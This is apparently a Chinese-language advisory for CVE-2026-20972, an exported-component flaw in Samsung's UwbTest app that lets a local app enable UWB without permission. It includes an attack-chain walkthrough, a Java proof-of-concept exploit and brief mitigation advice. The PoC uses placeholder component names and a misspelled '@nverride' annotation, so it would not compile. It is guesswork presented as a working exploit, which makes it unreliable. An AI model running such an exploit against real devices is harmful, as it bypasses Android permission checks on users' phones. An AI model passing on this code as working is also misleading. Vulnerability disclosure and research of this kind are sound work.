CVE-2026-20972 Samsung UwbTest应用组件导出不当漏洞

漏洞信息

漏洞编号

CVE-2026-20972

漏洞类型

组件导出不当/访问控制绕过

CVSS评分

3.3 低危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Samsung UwbTest应用 (SMR Jan-2026 Release 1之前版本)

漏洞概述

CVE-2026-20972是三星Android设备上发现的一个中低危安全漏洞。该漏洞存在于UwbTest应用程序中，由于组件导出不当（Improper Export of Android Application Components），允许本地攻击者在未获取适当权限的情况下启用设备的UWB（超宽带）功能。UWB是一种短距离无线通信技术，广泛应用于精准定位、近场通信和设备间数据传输。该漏洞的CVSS 3.1基础评分为3.3，属于低危级别。攻击者只需拥有设备本地访问权限和低权限账户即可利用此漏洞，无需用户交互。漏洞由三星移动安全团队（[email protected]）发现并报告，已在2026年1月的安全更新中修复。虽然该漏洞的直接危害相对有限（仅影响机密性和完整性的低级别影响），但它可能被用于进一步的攻击链或作为权限提升的跳板。

技术细节

该漏洞属于Android应用安全中的组件导出（Component Export）问题。在Android应用架构中，组件（Activity、Service、Broadcast Receiver、Content Provider）可以通过Intent Filter声明为导出（exported=true）或未导出状态。如果组件被错误地设置为可导出且未设置适当权限保护，外部应用或恶意代码可以通过发送特定Intent来调用这些组件。在UwbTest应用中，存在可导出的组件允许本地应用启动UWB功能而无需申请UWB权限（android.permission.UWB_RANGING）。攻击者只需构造特定的Intent对象，设置目标组件的包名和类名，然后使用startActivity()或类似方法发送该Intent即可触发UWB功能。这种攻击方式绕过了Android运行时权限检查机制，因为权限检查通常在应用程序尝试使用受保护API时进行，而不是在组件被调用时。CVSS向量AV:L/PR:L/UI:N表明这是一个需要本地访问但不需要高权限和用户交互的漏洞。

攻击链分析

STEP 1

步骤1: 侦察阶段

攻击者获取目标三星Android设备的本地访问权限。通过安装恶意应用或已安装应用的代码执行漏洞，获得在设备上运行代码的能力。

STEP 2

步骤2: 组件识别

攻击者使用adb shell dumpsys package或类似工具枚举UwbTest应用的组件。通过分析AndroidManifest.xml或反编译应用，识别可导出的Activity、Service或其他组件。

STEP 3

步骤3: Intent构造

攻击者构造恶意的Intent对象，设置目标组件的包名和类名，绕过正常的权限检查流程。如果组件需要额外参数，通过Intent extras传递。

STEP 4

步骤4: 漏洞利用

使用startActivity()、startService()或sendBroadcast()等方法发送构造好的Intent，触发UwbTest应用中的导出组件，从而启用UWB功能而无需UWB_RANGING权限。

STEP 5

步骤5: 持久化利用（可选）

攻击者可能将UWB功能滥用用于追踪用户位置、窃取敏感信息或作为进一步攻击的立足点。例如，结合其他漏洞实现权限提升。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2026-20972 PoC: Exploit UwbTest exported component to enable UWB
// This PoC demonstrates how a local attacker can enable UWB without proper permissions

package com.example.cve202620972poc;

import android.content.ComponentName;
import android.content.Intent;
import android.os.Bundle;
import androidx.appcompat.app.AppCompatActivity;

public class MainActivity extends AppCompatActivity {
    @nverride
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
        
        // Attempt to exploit UwbTest exported component
        exploitUwbComponent();
    }
    
    private void exploitUwbComponent() {
        try {
            // Target component in UwbTest app
            // Replace 'ComponentName' with actual exported component name
            ComponentName componentName = new ComponentName(
                "com.samsung.android.uwb",  // Package name
                "com.samsung.android.uwb.UwbTestActivity"  // Exported component
            );
            
            Intent intent = new Intent();
            intent.setComponent(componentName);
            intent.setAction("android.intent.action.MAIN");
            
            // Add any required extras if known
            // intent.putExtra("extra_name", "value");
            
            // Start the activity without UWB permission
            startActivity(intent);
            
            // UWB should now be enabled without android.permission.UWB_RANGING
            
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

// Note: This PoC requires:
// 1. Local access to the Samsung device
// 2. Low privilege app installation permission
// 3. Target device must have UwbTest app installed
// 4. Target device must support UWB hardware

影响范围

Samsung UwbTest < SMR Jan-2026 Release 1

防御指南

临时缓解措施

目前没有已知的临时缓解措施可以完全阻止此漏洞的利用。建议用户尽快将三星设备更新至2026年1月安全补丁或更高版本。在更新可用之前，用户应避免安装来源不明的应用，并定期检查设备上的应用权限设置，撤销不必要应用的安装权限。由于该漏洞需要本地访问，用户还应避免将设备借予不信任的人员使用。